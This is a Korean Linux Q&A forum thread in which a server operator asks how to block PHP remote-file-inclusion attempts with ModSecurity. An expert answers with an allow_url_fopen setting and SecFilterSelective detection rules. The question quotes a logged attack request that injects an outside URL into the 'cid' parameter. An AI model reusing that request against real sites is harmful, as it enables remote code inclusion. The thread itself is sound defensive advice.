질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

modsecurity 설정에 대한 문의를 드립니다

작성자 정보

  • 홍석범 작성
  • 작성일

컨텐츠 정보

본문

안녕하세요.. 씨디네트웍스 홍석범입니다.


아래의 공격방식은 몇년전부터 보였던 아주 전형적인 php injection 방식입니다.

굳이 modsecurity가 아니더라도 php.ini에서

allow_url_fopen = On 을
allow_url_fopen = Off 로만 변경하여 외부소스를 실행하지 못하도록 설정해도 쉽게 차단이 됩니다.

물론 modsecurity 에서도 차단룰이 기본적으로 있습니다.

SecFilterSelective REQUEST_URI "=(http|https|ftp):/" "msg:'PHP Injection Attacks'"

로 적용하셔도 되고, cid를 사용하신다니

SecFilterSelective REQUEST_URI "cid=(http|https|ftp):/" "msg:'PHP Injection Attacks'"

와 같이 지정하셔도 되겠습니다.

 

감사합니다.

보안철저 님의 글



modsecurity 설정에 대한 문의를 드립니다. 최근에 로그 화일을 살펴보니 모두 공통된

사항이 있어서 그부분을 차단하면 제가 운영하는 서버에서는 어느 정도 효과가 있을것만

간다는 생각이 들어서요 제가 운영하는 서버에는 거의 모두 같은 게시판을 사용합니다.

get으로 받는 cid가 카테고리 코드인데 아래와 같이 cid=http:// 이런 형식이 들어가 있더라구요.

modsecurity설정화일에 어떻게 추가를 해야 하는지 전문가님의 답변을 부탁드립니다.

그리고 먼저번 질문에 답변 주신 홍석범님께 깊이 감사드립니다.

 

 

88.80.202.189 - - [12/Nov/2008:05:30:30 +0900] "GET /board/kboard.php?board=notice&act=view&no=3//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 200 10155




 

관련자료

댓글 0
등록된 댓글이 없습니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,094 명
  • 현재 강좌수 :  36,058 개
  • 현재 접속자 :  240 명